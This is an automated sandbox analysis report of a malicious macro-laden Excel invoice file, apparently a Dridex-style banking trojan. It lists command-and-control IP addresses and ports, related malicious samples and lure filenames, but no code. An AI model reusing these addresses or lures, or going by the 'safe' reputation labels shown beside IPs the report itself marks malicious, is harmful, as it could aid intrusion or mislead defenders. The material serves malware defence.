https://80.86.91.27:3308/rh	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/(	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://80.86.91.27:3308/-	0%	Avira URL Cloud	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://80.86.91.27/	0%	Avira URL Cloud	safe
https://77.220.64.37/nd-point:	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/220.64.37	0%	Avira URL Cloud	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://5.100.228.233:3389/ES	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/crosoft	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/raphy	0%	Avira URL Cloud	safe
https://77.220.64.37/3321935-2125563209-4053062332-1002	0%	Avira URL Cloud	safe
https://77.220.64.37/B	0%	Avira URL Cloud	safe
https://77.220.64.37/F	0%	Avira URL Cloud	safe
https://77.220.64.37/;	0%	Avira URL Cloud	safe
https://77.220.64.37/?	0%	Avira URL Cloud	safe
https://77.220.64.37/S	0%	Avira URL Cloud	safe
https://77.220.64.37/W	0%	Avira URL Cloud	safe
https://77.220.64.37/H	0%	Avira URL Cloud	safe
https://77.220.64.37/O	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/la	0%	Avira URL Cloud	safe
https://77.220.64.37/c	0%	Avira URL Cloud	safe
https://77.220.64.37/e	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/ll	0%	Avira URL Cloud	safe
https://77.220.64.37/X	0%	Avira URL Cloud	safe
https://77.220.64.37/53321935-2125563209-4053062332-1002	0%	Avira URL Cloud	safe
https://46.105.131.65:1512/la	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/oft	0%	Avira URL Cloud	safe
https://77.220.64.37/l	0%	Avira URL Cloud	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://5.100.228.233:3389/X	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/Z	0%	Avira URL Cloud	safe
https://api.cortana.ai	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/P	0%	Avira URL Cloud	safe
https://staging.cortana.ai	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/N	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
osmosisecuador.com	192.185.41.153	true	false	5%, Virustotal, Browse	unknown
bulksms.interweblimited.com	74.220.219.210	true	false	2%, Virustotal, Browse	unknown
sistacweb.com	184.171.244.207	true	false	4%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://5.100.228.233:3389/	regsvr32.exe, 00000010.00000002.982129885.000000000080A000.00000004.00000020.sdmp, regsvr32.exe, 00000010.00000003.888626667.000000000086C000.00000004.00000001.sdmp, regsvr32.exe, 00000010.00000003.888613064.00000000008F2000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.941475415.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.968234770.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/P	regsvr32.exe, 00000012.00000003.974657502.00000000031A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://shell.suite.office.com:1443	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/105.131.65/pe	regsvr32.exe, 00000012.00000002.992729996.000000000317E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://cdn.entity.	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://5.100.228.233:3389/(	regsvr32.exe, 00000012.00000003.972870710.00000000031A3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://80.86.91.27:3308/D	regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/H	regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://46.105.131.65:1512/	regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.938801902.00000000031AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/si(	regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.aadrm.com/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://5.100.228.233:3389/8	regsvr32.exe, 00000012.00000003.952484888.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://5.100.228.233:3389/soft	regsvr32.exe, 00000010.00000002.982174522.0000000000866000.00000004.00000020.sdmp, regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.978555876.00000000031A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/si3	regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/0	regsvr32.exe, 00000012.00000003.974657502.00000000031A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308//	regsvr32.exe, 00000012.00000003.894507082.00000000031A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/rX	regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/3	regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/si=	regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://5.100.228.233:3389/0	regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.942509383.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/.(	regsvr32.exe, 00000012.00000003.962535896.00000000031A5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/8	regsvr32.exe, 00000012.00000003.941475415.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308//x	regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://api.microsoftstream.com/api/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://cr.office.com	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://5.100.228.233:3389/H	regsvr32.exe, 00000012.00000003.959829384.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://5.100.228.233:3389/D	regsvr32.exe, 00000012.00000003.952484888.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/rh	regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/(	regsvr32.exe, 00000012.00000003.925027011.00000000031AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://res.getmicrosoftkey.com/api/redemptionevents	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://80.86.91.27:3308/-	regsvr32.exe, 00000012.00000003.962590797.000000000317E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://tasks.office.com	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://officeci.azurewebsites.net/api/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	Avira URL Cloud: safe	unknown
https://store.office.cn/addinstemplate	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://80.86.91.27/	regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.884237810.00000000031AF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/nd-point:	regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/220.64.37	regsvr32.exe, 00000012.00000003.890960750.00000000031AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://www.odwebp.svc.ms	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://web.microsoftstream.com/video/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://5.100.228.233:3389/ES	regsvr32.exe, 00000012.00000003.952484888.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.978555876.00000000031A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://graph.windows.net	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://80.86.91.27:3308/crosoft	regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.898757958.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/raphy	regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
http://weather.service.msn.com/data.aspx	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/3321935-2125563209-4053062332-1002	regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/B	regsvr32.exe, 00000010.00000002.982129885.000000000080A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/F	regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/ios	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/;	regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/?	regsvr32.exe, 00000012.00000003.898757958.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://o365auditrealtimeingestion.manage.office.com	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/S	regsvr32.exe, 00000012.00000003.936022022.00000000031AF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/W	regsvr32.exe, 00000012.00000003.894507082.00000000031A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://entitlement.diagnostics.office.com	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://outlook.office.com/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/H	regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/O	regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://storage.live.com/clientlogs/uploadlocation	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://5.100.228.233:3389/la	regsvr32.exe, 00000012.00000003.978500644.000000000317D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/c	regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/b	regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	false		unknown
https://77.220.64.37/e	regsvr32.exe, 00000010.00000002.1036478024.0000000004944000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://5.100.228.233:3389/ll	regsvr32.exe, 00000012.00000003.978500644.000000000317D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/X	regsvr32.exe, 00000012.00000003.917292709.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/53321935-2125563209-4053062332-1002	regsvr32.exe, 00000010.00000002.982201012.00000000008D5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.105.131.65:1512/la	regsvr32.exe, 00000012.00000003.972854437.000000000317D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://graph.windows.net/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://devnull.onenote.com	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://5.100.228.233:3389/oft	regsvr32.exe, 00000010.00000003.872389085.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.894507082.00000000031A8000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://messaging.office.com/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://77.220.64.37/l	regsvr32.exe, 00000012.00000003.890960750.00000000031AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://skyapi.live.net/Activity/	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://5.100.228.233:3389/X	regsvr32.exe, 00000012.00000003.968234770.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://5.100.228.233:3389/Z	regsvr32.exe, 00000010.00000002.982174522.0000000000866000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://api.cortana.ai	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	Avira URL Cloud: safe	unknown
https://5.100.228.233:3389/P	regsvr32.exe, 00000012.00000003.922794583.00000000031AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://staging.cortana.ai	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/embed?	6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	false		high
https://5.100.228.233:3389/N	regsvr32.exe, 00000010.00000003.888626667.000000000086C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
192.185.41.153	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false
5.100.228.233	unknown	Netherlands	8315	SENTIANL	true
80.86.91.27	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
46.105.131.65	unknown	France	16276	OVHFR	true
74.220.219.210	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false
184.171.244.207	unknown	United States	33182	DIMENOCUS	false
77.220.64.37	unknown	Italy	44160	INTERNETONEInternetServicesProviderIT	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338158
Start date:	11.01.2021
Start time:	18:33:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 5s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	sample20210111-01.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.expl.evad.winXLSM@9/19@3/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 34% (good quality ratio 33.7%) Quality average: 80% Quality standard deviation: 18.8%
HCA Information:	Successful, ratio: 90% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.139.144, 104.42.151.234, 13.64.90.137, 52.109.32.63, 52.109.76.35, 52.109.8.24, 51.11.168.160, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 51.104.139.180, 2.20.142.210, 2.20.142.209 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:34:26	API Interceptor	21x Sleep call for process: splwow64.exe modified
18:35:28	API Interceptor	294x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
192.185.41.153	BOL_860766.xlsm	Get hash	malicious	Browse
192.185.41.153	#Ud83d#Udcde Tetratech.com Audio_4544.htm	Get hash	malicious	Browse
5.100.228.233	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
80.86.91.27	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
46.105.131.65	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
77.220.64.37	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Dridex.735.5073.dll	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xls	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1-Total New Invoices Monday Dec 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Mal.EncPk-APV.3900.dll	Get hash	malicious	Browse
	ygyq4p539.rar.dll	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
osmosisecuador.com	BOL_860766.xlsm	Get hash	malicious	Browse	192.185.41.153

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GD-EMEA-DC-SXB1DE	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	80.86.91.27
	hiytvys.dll	Get hash	malicious	Browse	80.86.91.27
	l7rgi3xyd.dll	Get hash	malicious	Browse	80.86.91.27
	ymuyks.dll	Get hash	malicious	Browse	80.86.91.27
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	80.86.91.27
	hy9x6wzip.dll	Get hash	malicious	Browse	80.86.91.27
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	80.86.91.27
	jufk0vrar.dll	Get hash	malicious	Browse	80.86.91.27
	s3CRQNulKZ.exe	Get hash	malicious	Browse	217.172.179.54
	DFR2154747.vbe	Get hash	malicious	Browse	85.25.93.233
	r8a97.exe	Get hash	malicious	Browse	62.75.168.106
	NKsplucdAu.exe	Get hash	malicious	Browse	217.172.179.54
	lZVNh1BPxm.exe	Get hash	malicious	Browse	217.172.179.54
	qG5E4q8Cv5.exe	Get hash	malicious	Browse	217.172.179.54
	SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exe	Get hash	malicious	Browse	217.172.179.54
	990109.exe	Get hash	malicious	Browse	87.230.93.218
	og0gax.dll	Get hash	malicious	Browse	62.138.14.216
	M1OrQwls8C.dll	Get hash	malicious	Browse	62.138.14.216
	https://installforge.net/downloads/?i=IFSetup	Get hash	malicious	Browse	5.175.14.17
	SecuriteInfo.com.Trojan.Dridex.735.5073.dll	Get hash	malicious	Browse	85.25.144.36
UNIFIEDLAYER-AS-1US	SEA LION LOGISTICS-URGENT QUOTATION.exe	Get hash	malicious	Browse	192.185.0.218
	Electronic form.doc	Get hash	malicious	Browse	50.116.111.59
	8wPRuahY1M.dll	Get hash	malicious	Browse	50.116.111.59
	ARCH_2021.doc	Get hash	malicious	Browse	162.241.153.163
	PO21010699XYJ.exe	Get hash	malicious	Browse	216.172.185.10
	Scanned_25526662-Payment.xls	Get hash	malicious	Browse	192.185.236.165
	Telex06012020.xls	Get hash	malicious	Browse	192.185.236.165
	ul9kpUwYel.xls	Get hash	malicious	Browse	192.185.194.191
	______.doc	Get hash	malicious	Browse	192.185.151.24
	______.doc	Get hash	malicious	Browse	192.185.151.24
	http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20=	Get hash	malicious	Browse	162.241.175.181
	http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.com	Get hash	malicious	Browse	50.87.150.0
	https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeG	Get hash	malicious	Browse	162.241.127.190
	https://cypressbayhockey.com/NO	Get hash	malicious	Browse	192.185.120.89
	https://pdfsharedmessage.xtensio.com/7wtcdlta	Get hash	malicious	Browse	108.179.246.23
	form.doc	Get hash	malicious	Browse	162.241.148.243
	RFQPO90865802ICONME.exe	Get hash	malicious	Browse	192.185.131.105
	Ekz Payment.htm	Get hash	malicious	Browse	192.185.196.146
	http://moneypay.best/	Get hash	malicious	Browse	192.232.250.4
	https://canningelectricinc.wordpress.com/	Get hash	malicious	Browse	192.185.188.96
SENTIANL	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	5.100.228.233
	hiytvys.dll	Get hash	malicious	Browse	5.100.228.233
	l7rgi3xyd.dll	Get hash	malicious	Browse	5.100.228.233
	ymuyks.dll	Get hash	malicious	Browse	5.100.228.233
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	5.100.228.233
	hy9x6wzip.dll	Get hash	malicious	Browse	5.100.228.233
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	5.100.228.233
